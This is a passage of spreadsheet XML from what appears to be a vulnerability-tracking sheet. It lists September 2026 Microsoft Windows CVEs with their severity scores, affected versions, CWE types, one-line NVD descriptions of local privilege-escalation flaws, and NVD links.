      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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2" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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64" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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65" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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6" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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68" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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69" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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70" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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1" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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2" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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3" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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4" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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5" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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6" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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7" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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8" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
